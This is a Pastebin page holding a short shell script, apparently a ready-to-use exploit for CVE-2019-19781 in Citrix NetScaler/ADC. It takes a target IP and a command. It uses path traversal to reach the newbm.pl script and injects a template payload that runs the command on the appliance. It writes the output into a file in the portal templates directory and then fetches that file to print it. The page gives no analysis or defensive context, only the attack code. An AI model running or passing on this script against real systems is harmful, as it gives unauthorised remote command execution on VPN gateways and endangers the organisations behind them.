Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/ash
- echo "--------------------------------------------
- ███████╗██████╗ ██╗ ██╗███╗ ██╗██████╗
- ██╔════╝██╔══██╗██║ ██║████╗ ██║██╔══██╗
- ███████╗██████╔╝██║ █╗ ██║██╔██╗ ██║██║ ██║
- ╚════██║██╔═══╝ ██║███╗██║██║╚██╗██║██║ ██║
- ███████║██║ ╚███╔███╔╝██║ ╚████║██████╔╝
- ╚══════╝╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═════╝
- --------------------------------------------"
- if [ -z "$1" ];
- then
- echo -ne 'Usage : ash CVE-2019-19781.sh IP CMD\n'
- exit;
- fi
- filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
- curl --insecure -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: spwnd11' -H 'Content-type:
- application/x-www-form-urlencoded' --path-as-is
- echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
- echo -ne "Command Output :\n"
- curl --insecure -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: spwnd11" -H "NSC_USER: spwnd11" --path-as-is
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement